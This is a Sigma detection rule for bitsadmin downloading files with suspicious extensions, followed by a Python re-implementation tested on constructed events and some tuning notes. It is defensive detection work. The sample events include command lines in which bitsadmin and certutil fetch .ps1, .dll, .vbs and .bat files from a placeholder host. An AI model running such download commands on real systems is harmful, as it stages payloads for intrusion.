File With Suspicious Extension Downloaded Via Bitsadmin
Detects usage of bitsadmin downloading a file with a suspicious extension
Sigma rule
```yaml
title: File With Suspicious Extension Downloaded Via Bitsadmin
id: 5b80a791-ad9b-4b75-bcc1-ad4e1e89c200
status: test
description: Detects usage of bitsadmin downloading a file with a suspicious extension
references:
    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
    - https://isc.sans.edu/diary/22264
    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-28
modified: 2023-05-30
tags:
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1197
    - attack.s0190
    - attack.t1036.003
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\bitsadmin.exe'
        - OriginalFileName: 'bitsadmin.exe'
    selection_flags:
        CommandLine|contains:
            - ' /transfer '
            - ' /create '
            - ' /addfile '
    selection_extension:
        CommandLine|contains:
            - '.7z'
            - '.asax'
            - '.ashx'
            - '.asmx'
            - '.asp'
            - '.aspx'
            - '.bat'
            - '.cfm'
            - '.cgi'
            - '.chm'
            - '.cmd'
            - '.dll'
            - '.gif'
            - '.jpeg'
            - '.jpg'
            - '.jsp'
            - '.jspx'
            - '.log'
            - '.png'
            - '.ps1'
            - '.psm1'
            - '.rar'
            - '.scf'
            - '.sct'
            - '.txt'
            - '.vbe'
            - '.vbs'
            - '.war'
            - '.wsf'
            - '.wsh'
            - '.xll'
            - '.zip'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions/info.yml
simulation:
    - type: atomic-red-team
      name: Windows - BITSAdmin BITS Download
      technique: T1105
      atomic_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
```
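The block below is an added example, not code from the rule above or from the SigmaHQ project: it re-implements the rule's three selections and its `all of selection_*` condition in plain Python and runs them over a handful of constructed process_creation events (invented for illustration, not real telemetry). It assumes the Sigma Windows process_creation field names `Image`, `OriginalFileName` and `CommandLine`, and that string matching is case-insensitive, as Sigma specifies. It returns which selection fired and which extensions matched, which is the information an analyst wants on the alert itself.

```python
# Added example, not part of the SigmaHQ rule or project: a plain-Python mirror
# of the rule's matching logic, evaluated against constructed events.
# Assumes Sigma Windows process_creation field names (Image, OriginalFileName,
# CommandLine) and Sigma's case-insensitive string matching.

# selection_extension, copied verbatim from the rule.
SUSPICIOUS_EXTENSIONS = (
    ".7z", ".asax", ".ashx", ".asmx", ".asp", ".aspx", ".bat", ".cfm", ".cgi",
    ".chm", ".cmd", ".dll", ".gif", ".jpeg", ".jpg", ".jsp", ".jspx", ".log",
    ".png", ".ps1", ".psm1", ".rar", ".scf", ".sct", ".txt", ".vbe", ".vbs",
    ".war", ".wsf", ".wsh", ".xll", ".zip",
)
# selection_flags: the bitsadmin verbs that create or feed a transfer job.
DOWNLOAD_FLAGS = (" /transfer ", " /create ", " /addfile ")


def evaluate(event: dict) -> dict:
    """Evaluate the three selections and the condition against one event.

    Every field is lowercased first because Sigma string modifiers match
    case-insensitively. The returned dict records which selection hit and
    which extensions matched, so an alert can explain itself.
    """
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "").lower()

    # selection_img is a list of maps, which Sigma ORs: either the path ends
    # in \bitsadmin.exe or the PE's OriginalFileName says so. The second
    # branch is what catches a renamed copy of the binary.
    sel_img = image.endswith("\\bitsadmin.exe") or original == "bitsadmin.exe"
    # A list of values under one field is also ORed.
    sel_flags = any(flag in cmd for flag in DOWNLOAD_FLAGS)
    # |contains matches anywhere in the command line, URL path included.
    hit_exts = [ext for ext in SUSPICIOUS_EXTENSIONS if ext in cmd]

    return {
        "selection_img": sel_img,
        "selection_flags": sel_flags,
        "selection_extension": bool(hit_exts),
        "matched_extensions": hit_exts,
        "alert": sel_img and sel_flags and bool(hit_exts),  # all of selection_*
    }


def matches_rule(event: dict) -> bool:
    return evaluate(event)["alert"]


def firing_events(events) -> list:
    """Indexes of the events that would raise this alert."""
    return [i for i, ev in enumerate(events) if matches_rule(ev)]


# Constructed sample events (hypothetical hosts and URLs, not real telemetry).
SAMPLE_EVENTS = [
    {   # 0: download of a PowerShell script -> alert
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"bitsadmin.exe /transfer job1 /download /priority foreground http://files.example.invalid/stage.ps1 C:\Users\Public\stage.ps1",
    },
    {   # 1: binary renamed to dodge path checks; OriginalFileName still hits -> alert
        "Image": r"C:\Users\Public\svchost32.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"svchost32.exe /addfile updjob http://files.example.invalid/u.dll C:\Windows\Temp\u.dll",
    },
    {   # 2: mixed-case verb and extension; matching is case-insensitive -> alert
        "Image": r"C:\Windows\SysWOW64\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"BITSADMIN /Transfer J /Download /Priority High http://files.example.invalid/X.VBS C:\Temp\X.VBS",
    },
    {   # 3: job listing, no download verb -> no alert
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": "bitsadmin.exe /list /allusers /verbose",
    },
    {   # 4: download of an .msi, which the list does not cover -> no alert
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"bitsadmin.exe /transfer inst /download /priority normal http://files.example.invalid/setup.msi C:\Temp\setup.msi",
    },
    {   # 5: a different LOLBin fetching a .bat -> not this rule's job
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"certutil.exe -urlcache -split -f http://files.example.invalid/a.bat C:\Temp\a.bat",
    },
]


if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        r = evaluate(ev)
        print(i, "ALERT" if r["alert"] else "-----", r["matched_extensions"], ev["CommandLine"][:60])
```

Two properties of the rule are visible in the sample run. First, `|contains` is a substring test over the whole command line, so entries such as `.txt`, `.log`, `.png` or `.jpg` will also fire on legitimate transfer jobs and on any URL path that happens to contain them; those are the entries to look at first when tuning with a `filter` selection. Second, the extension list is a closed allow-list of "suspicious" types, so a `.msi` or `.exe` pulled with `/transfer` (event 4) is silent here and is left to the broader "File Download Via Bitsadmin" rule listed under Related rules.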
Related rules
- File Download Via Bitsadmin
- File Download Via Bitsadmin To A Suspicious Target Folder
- Suspicious Download From File-Sharing Website Via Bitsadmin
- Bitsadmin to Uncommon IP Server Address
- Bitsadmin to Uncommon TLD